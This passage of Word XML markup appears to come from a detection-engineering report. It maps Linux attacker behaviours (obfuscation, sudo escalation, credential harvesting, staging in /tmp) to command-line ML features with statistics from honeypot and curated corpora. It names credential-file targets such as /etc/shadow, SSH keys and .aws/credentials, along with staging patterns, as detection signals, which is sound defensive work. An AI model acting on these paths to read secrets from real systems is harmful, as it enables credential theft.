          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Derived / engineered feature(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_base64_blob</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>b64_run_len</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_hex_escape</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_decode_exec</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_quote_splice</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_ifs_expansion</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, supported by the two density ratios </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>special_ratio</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>digit_ratio</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Detailed explanation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Obfuscation is the one adversarial behaviour that </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>adds</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> rather than removes signal, because the evasion itself is anomalous: benign administration has no reason to splice a binary name or route arguments through </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>$IFS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">. The micro-structural features are accordingly sharp but rare — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_decode_exec</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> at OR 45.1 and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_quote_splice</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> at OR 27.0 on Dataset 1, each firing on well under 1% of rows. Rarity is the point: they contribute nothing to aggregate accuracy and everything to the cases that matter, which is why they are kept despite near-zero solo F1. The two ratio features are the dense counterpart, capturing the same phenomenon continuously — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>special_ratio</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> is the second-strongest feature in the whole set by effect size on Dataset 1 (d +0.32, AUC 0.66). The honest caveat is that this family is Dataset-1-heavy: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_decode_exec</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> inverts to OR 0.60 on the honeypot corpus, where attackers type unencoded droppers because they are not evading anything.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Row N2 — Privilege escalation via sudo</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 xml:space="preserve">Attacker elevates from an unprivileged foothold to root using the host's own elevation mechanism, invoking </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>su</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> directly or exploiting cached credentials and permissive </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>sudoers</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> entries (T1548.003 Sudo and Sudo Caching; platforms Linux,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as above; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>auditd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> EXECVE is the authoritative source because it records the escalation attempt whether or not it succeeded.</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and specifically its </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>first token</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> after assignment-prefix stripping — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>su</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>doas</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>pkexec</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> in head position, as distinct from the same tokens appearing anywhere in the line.</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head_is_privesc</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> — and nothing else.</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sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">This row is deliberately the thinnest, because the evidence forced it. The obvious feature, a presence flag </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_privesc_bin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, was built, measured and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>killed</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">: at OR 0.99 (Dataset 1) and 1.01 (Dataset 2) it is almost perfectly class-neutral. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>chmod</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> are simply everywhere, in attack corpora and administrator history alike, so presence carries no information. What survives is </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>position</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">: a command whose head is the elevation binary is an escalation attempt, whereas one that merely mentions it is usually documentation or a compound administrative line. Even then the feature is corpus-dependent and inverts — OR 0.77 on Dataset 1 versus 3.70 on Dataset 2 — because the curated Dataset 1 benign sources are full of </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>-prefixed tutorial commands while the honeypot's benign side is real user history. Reported as-is rather than smoothed over: it is a case where the technique is real, security-critical, and only weakly separable from ordinary administration by content alone.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Row N3 — Credential harvesting from files</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 xml:space="preserve">Attacker reads credential material straight off the filesystem — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/etc/shadow</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>, SSH private keys, cloud and application config — using ordinary file-reading utilities, requiring no tooling and leaving no dropped binary (T1552.001 Credentials In Files; platforms Containers, IaaS, Linux, Windows,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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>auditd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> EXECVE argv captures the target path as an argument token.</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absolute paths under </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/etc</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/proc</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/var/log</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/root</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>; dot-prefixed path components (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>~/.ssh/id_rsa</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>.aws/credentials</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>.bash_history</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>); and the path count itself.</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n_sensitive_paths</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_abs_paths</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_hidden_path</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_home_ref</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>.</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sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">The behaviour is expressed almost entirely through </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>what is named</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, not what is run, which makes the path features the natural encoding. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_abs_paths</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> is the single strongest feature in the project on Dataset 1 — d +0.45, AUC 0.73, solo-rule F1 0.595 against a 0.40 do-nothing floor, and the top Random Forest Gini importance at 0.124 — because reaching for absolute paths is characteristic of an operator working somewhere unfamiliar rather than in their own working directory. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_sensitive_paths</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> is deliberately a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>lumped count</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">: the finer-grained </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_cred_paths</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_proc_paths</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_log_paths</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> were each built and killed for failing the selection gate individually, and pooling them recovers a feature that passes on both corpora (d +0.18 / +0.06). </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_hidden_path</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> is the most transferable member of the group, holding at OR 4.36 and 3.99 across two corpora that agree on very little. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_home_ref</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> is the counter-example and is reported as such — OR 2.02 on Dataset 1 but 0.38 on Dataset 2, where </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>~</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> references are the ordinary vocabulary of a real user's shell history.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Row N4 — Local staging before exfiltration</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4536"/>
        <w:gridCol w:w="4536"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4536"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4536"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4536"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Adversarial behavioural characteristic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4536"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Attacker collects, archives and parks data in a world-writable scratch directory prior to exfiltration, or uses the same directories to land and execute a second-stage payload (T1074.001 Local Data Staging; platforms ESXi, Linux, Windows, macOS).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4536"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Required telemetry source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4536"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Shell command log; Cowrie </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cowrie.command.input</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> is the richest source here, since dropper chains are logged whole as a single attacker input line.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4536"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Specific log attributes / raw fields</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4536"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>command</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> string: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/tmp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/var/tmp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/dev/shm</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> as path prefixes, typically alongside </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>tar</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>zip</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>chmod +x</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>, and a subsequent relative execution (</w:t>
